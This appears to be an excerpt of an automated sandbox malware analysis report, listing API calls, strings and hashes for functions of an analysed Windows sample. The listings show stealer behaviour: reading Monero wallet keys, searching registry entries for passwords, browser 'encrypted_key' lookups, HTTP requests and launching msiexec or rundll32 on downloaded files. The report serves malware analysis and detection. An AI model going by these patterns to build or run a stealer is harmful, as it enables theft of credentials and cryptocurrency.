                              • Opcode Fuzzy Hash: 9ac0890f21d748586928f5e5e460c4bd24e4fcafcf861a96f8e4238688db2f39
                              • Instruction Fuzzy Hash: 834172BA95020467CB50F770DD4BFEE7378AB64740F408894B68A660C1FEB45BC9CB92
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00A6906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: a82492473e9d67e772b4f5f9f79e75ae1a92fd0ed87039fe8dc5d38e7176a97c
                              • Instruction ID: 3aa998650927f271a0ac330b5c46046f1c57090f6f9c71ceb8f43f0561563406
                              • Opcode Fuzzy Hash: a82492473e9d67e772b4f5f9f79e75ae1a92fd0ed87039fe8dc5d38e7176a97c
                              • Instruction Fuzzy Hash: 5571EEB1910208EBDB04EFE4DD99FEEB7B8BF48700F108509F615A7290DB74A905CBA1
                              APIs
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00A631C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00A6335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 00A634EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: 8cd8d094e4348ab58462ad460f504a2628b7bf3ddbe34faac3a6e0b0c7387f97
                              • Instruction ID: 7aee0124ea1de4d805b15a63c0f147cc51dd8868a46e786ca5a94684f22f8f1c
                              • Opcode Fuzzy Hash: 8cd8d094e4348ab58462ad460f504a2628b7bf3ddbe34faac3a6e0b0c7387f97
                              • Instruction Fuzzy Hash: 6312FE729101089ADB15EFA0DE92FEEB738AF24300F508559F50677191EF746B4ACFA2
                              APIs
                                • Part of subcall function 00A6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A6A7E6
                                • Part of subcall function 00A56280: InternetOpenA.WININET(00A70DFE,00000001,00000000,00000000,00000000), ref: 00A562E1
                                • Part of subcall function 00A56280: StrCmpCA.SHLWAPI(?,0144F340), ref: 00A56303
                                • Part of subcall function 00A56280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00A56335
                                • Part of subcall function 00A56280: HttpOpenRequestA.WININET(00000000,GET,?,0144EB08,00000000,00000000,00400100,00000000), ref: 00A56385
                                • Part of subcall function 00A56280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00A563BF
                                • Part of subcall function 00A56280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00A563D1
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                              • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00A65318
                              • lstrlen.KERNEL32(00000000), ref: 00A6532F
                                • Part of subcall function 00A68E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00A68E52
                              • StrStrA.SHLWAPI(00000000,00000000), ref: 00A65364
                              • lstrlen.KERNEL32(00000000), ref: 00A65383
                              • lstrlen.KERNEL32(00000000), ref: 00A653AE
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                              • String ID: ERROR$ERROR$ERROR$ERROR$ERROR
                              • API String ID: 3240024479-1526165396
                              • Opcode ID: a5c9f27c802594cab21f7a020b52093cb616e468b22b08d11e4b113a1969c846
                              • Instruction ID: 372f68d4126f95f1f5b8afe0731bb7bde927fb0feeb7ccc59dd60bb5430d2c2b
                              • Opcode Fuzzy Hash: a5c9f27c802594cab21f7a020b52093cb616e468b22b08d11e4b113a1969c846
                              • Instruction Fuzzy Hash: B651DD70910148ABCB14FF64CE96AED7779AF20341F504018F91AAB591EF346B46CFA2
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpylstrlen
                              • String ID:
                              • API String ID: 2001356338-0
                              • Opcode ID: 4a8c0c4a674d5185f3bf9c16c97f7ec6afd049277d807757c5328c450b2816a1
                              • Instruction ID: cd604e64bb40585627c63606c764156dfcb83c17b5ecca6a4bb3a93738769954
                              • Opcode Fuzzy Hash: 4a8c0c4a674d5185f3bf9c16c97f7ec6afd049277d807757c5328c450b2816a1
                              • Instruction Fuzzy Hash: EBC1B6B59002199BCB14EF60DD89FEE7778BF64304F004599F10AA7281EF74AA85CFA1
                              APIs
                                • Part of subcall function 00A68DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00A68E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00A642EC
                              • lstrcat.KERNEL32(?,0144EFD0), ref: 00A6430B
                              • lstrcat.KERNEL32(?,?), ref: 00A6431F
                              • lstrcat.KERNEL32(?,0144D668), ref: 00A64333
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A68D90: GetFileAttributesA.KERNEL32(00000000,?,00A51B54,?,?,00A7564C,?,?,00A70E1F), ref: 00A68D9F
                                • Part of subcall function 00A59CE0: StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00A59D39
                                • Part of subcall function 00A599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A599EC
                                • Part of subcall function 00A599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A59A11
                                • Part of subcall function 00A599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00A59A31
                                • Part of subcall function 00A599C0: ReadFile.KERNEL32(000000FF,?,00000000,00A5148F,00000000), ref: 00A59A5A
                                • Part of subcall function 00A599C0: LocalFree.KERNEL32(00A5148F), ref: 00A59A90
                                • Part of subcall function 00A599C0: CloseHandle.KERNEL32(000000FF), ref: 00A59A9A
                                • Part of subcall function 00A693C0: GlobalAlloc.KERNEL32(00000000,00A643DD,00A643DD), ref: 00A693D3
                              • StrStrA.SHLWAPI(?,0144EEC8), ref: 00A643F3
                              • GlobalFree.KERNEL32(?), ref: 00A64512
                                • Part of subcall function 00A59AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A54EEE,00000000,00000000), ref: 00A59AEF
                                • Part of subcall function 00A59AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00A54EEE,00000000,?), ref: 00A59B01
                                • Part of subcall function 00A59AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00A54EEE,00000000,00000000), ref: 00A59B2A
                                • Part of subcall function 00A59AC0: LocalFree.KERNEL32(?,?,?,?,00A54EEE,00000000,?), ref: 00A59B3F
                              • lstrcat.KERNEL32(?,00000000), ref: 00A644A3
                              • StrCmpCA.SHLWAPI(?,00A708D1), ref: 00A644C0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00A644D2
                              • lstrcat.KERNEL32(00000000,?), ref: 00A644E5
                              • lstrcat.KERNEL32(00000000,00A70FB8), ref: 00A644F4
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$FileLocal$AllocFree$BinaryCryptGlobalString$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                              • String ID:
                              • API String ID: 3541710228-0
                              • Opcode ID: af887930989c7744ba17298dc5fb91ab0e02b8700a2c788e7d771b741cdd1211
                              • Instruction ID: 323240a6c0319713f2222ad17525fa9a2bcfd3abd12d2c9e557a89fe0e21e000
                              • Opcode Fuzzy Hash: af887930989c7744ba17298dc5fb91ab0e02b8700a2c788e7d771b741cdd1211
                              • Instruction Fuzzy Hash: 9C7148B6910208ABDF14EBA0DD89FEE737DBB58700F044599F605A7181EA34DB49CF91
                              APIs
                                • Part of subcall function 00A512A0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 00A512B4
                                • Part of subcall function 00A512A0: RtlAllocateHeap.NTDLL(00000000), ref: 00A512BB
                                • Part of subcall function 00A512A0: RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 00A512D7
                                • Part of subcall function 00A512A0: RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 00A512F5
                                • Part of subcall function 00A512A0: RegCloseKey.ADVAPI32(?), ref: 00A512FF
                              • lstrcat.KERNEL32(?,00000000), ref: 00A5134F
                              • lstrlen.KERNEL32(?), ref: 00A5135C
                              • lstrcat.KERNEL32(?,.keys), ref: 00A51377
                                • Part of subcall function 00A6A740: lstrcpy.KERNEL32(00A70E17,00000000), ref: 00A6A788
                                • Part of subcall function 00A6A9B0: lstrlen.KERNEL32(?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A6A9C5
                                • Part of subcall function 00A6A9B0: lstrcpy.KERNEL32(00000000), ref: 00A6AA04
                                • Part of subcall function 00A6A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00A6AA12
                                • Part of subcall function 00A6A8A0: lstrcpy.KERNEL32(?,00A70E17), ref: 00A6A905
                                • Part of subcall function 00A68B60: GetSystemTime.KERNEL32(00A70E1A,0144E318,00A705AE,?,?,00A513F9,?,0000001A,00A70E1A,00000000,?,014488B8,?,\Monero\wallet.keys,00A70E17), ref: 00A68B86
                                • Part of subcall function 00A6A920: lstrcpy.KERNEL32(00000000,?), ref: 00A6A972
                                • Part of subcall function 00A6A920: lstrcat.KERNEL32(00000000), ref: 00A6A982
                              • CopyFileA.KERNEL32(?,00000000,00000001), ref: 00A51465
                                • Part of subcall function 00A6A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00A6A7E6
                                • Part of subcall function 00A599C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00A599EC
                                • Part of subcall function 00A599C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00A59A11
                                • Part of subcall function 00A599C0: LocalAlloc.KERNEL32(00000040,?), ref: 00A59A31
                                • Part of subcall function 00A599C0: ReadFile.KERNEL32(000000FF,?,00000000,00A5148F,00000000), ref: 00A59A5A
                                • Part of subcall function 00A599C0: LocalFree.KERNEL32(00A5148F), ref: 00A59A90
                                • Part of subcall function 00A599C0: CloseHandle.KERNEL32(000000FF), ref: 00A59A9A
                              • DeleteFileA.KERNEL32(00000000), ref: 00A514EF
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcpy$lstrcat$CloseHeapLocallstrlen$AllocAllocateCopyCreateDeleteFreeHandleOpenProcessQueryReadSizeSystemTimeValue
                              • String ID: .keys$SOFTWARE\monero-project\monero-core$\Monero\wallet.keys$wallet_path
                              • API String ID: 3478931302-218353709
                              • Opcode ID: 3c1a9c4e4a494fb88a78a1d340912dc4815dd9e046b1fca58648ee8cb6dd3cf0
                              • Instruction ID: 92dd13eb0105c27fe763d11c94ede9f234c820d0faa1c10f8cf691722b7e8af9
                              • Opcode Fuzzy Hash: 3c1a9c4e4a494fb88a78a1d340912dc4815dd9e046b1fca58648ee8cb6dd3cf0
                              • Instruction Fuzzy Hash: F25122B1D5011997CB15FB60DE96FED733CAB64700F404599B60AB2092EE306B89CFA6
                              APIs
                                • Part of subcall function 00A572D0: memset.MSVCRT ref: 00A57314
                                • Part of subcall function 00A572D0: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00A5733A
                                • Part of subcall function 00A572D0: RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00A573B1
                                • Part of subcall function 00A572D0: StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00A5740D
                                • Part of subcall function 00A572D0: GetProcessHeap.KERNEL32(00000000,?), ref: 00A57452
                                • Part of subcall function 00A572D0: HeapFree.KERNEL32(00000000), ref: 00A57459
                              • lstrcat.KERNEL32(00000000,00A717FC), ref: 00A57606
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00A57648
                              • lstrcat.KERNEL32(00000000, : ), ref: 00A5765A
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00A5768F
                              • lstrcat.KERNEL32(00000000,00A71804), ref: 00A576A0
                              • lstrcat.KERNEL32(00000000,00000000), ref: 00A576D3
                              • lstrcat.KERNEL32(00000000,00A71808), ref: 00A576ED
                              • task.LIBCPMTD ref: 00A576FB
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$Heap$EnumFreeOpenProcessValuememsettask
                              • String ID: :
                              • API String ID: 3191641157-3653984579
                              • Opcode ID: f22756ddcd7ef2357e9be1ef44c3ed87e31d9357dfc00f5e6bc7c5b80dafa966
                              • Instruction ID: 718f84aff2fa403d636775b36f367d31b221518254e193bd3d352f855e2bea51
                              • Opcode Fuzzy Hash: f22756ddcd7ef2357e9be1ef44c3ed87e31d9357dfc00f5e6bc7c5b80dafa966
                              • Instruction Fuzzy Hash: 4B313C71900109EBCB04EBB4DD99FFF7778BB44702B144519F502B72A0DA34A94ACB92
                              APIs
                              • memset.MSVCRT ref: 00A57314
                              • RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 00A5733A
                              • RegEnumValueA.ADVAPI32(?,00000000,00000000,000000FF,00000000,00000003,?,?), ref: 00A573B1
                              • StrStrA.SHLWAPI(00000000,Password,00000000), ref: 00A5740D
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00A57452
                              • HeapFree.KERNEL32(00000000), ref: 00A57459
                              • task.LIBCPMTD ref: 00A57555
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$EnumFreeOpenProcessValuememsettask
                              • String ID: Password
                              • API String ID: 2808661185-3434357891
                              • Opcode ID: 97db1b4211784972d038d94db2aca61b8bb861e77481cf9962b3a74d2f30287e
                              • Instruction ID: 8c25086205e08cde496ad8cf554ac2161e6fe60a5eb356d4ea09f829704410ef
                              • Opcode Fuzzy Hash: 97db1b4211784972d038d94db2aca61b8bb861e77481cf9962b3a74d2f30287e
                              • Instruction Fuzzy Hash: 69613DB59041689BDB24DB50DD45FDEB7B8BF44301F0081E9EA49A6181EB705FC9CFA1
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00000000,00000000,?,0144EBB0,00000000,?,00A70E2C,00000000,?,00000000), ref: 00A68130
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00A68137
                              • GlobalMemoryStatusEx.KERNEL32(00000040,00000040,00000000), ref: 00A68158
                              • __aulldiv.LIBCMT ref: 00A68172
                              • __aulldiv.LIBCMT ref: 00A68180
                              • wsprintfA.USER32 ref: 00A681AC
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.1353041836.0000000000A51000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A50000, based on PE: true
                              • Associated: 00000001.00000002.1353028407.0000000000A50000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B01000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B0D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000B32000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1353041836.0000000000C9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000CAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000E35000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F10000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F36000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F40000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1354117623.0000000000F4E000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364127921.0000000000F4F000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364739383.00000000010F0000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1364894008.00000000010F1000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_a50000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap__aulldiv$AllocateGlobalMemoryProcessStatuswsprintf
                              • String ID: %d MB$@
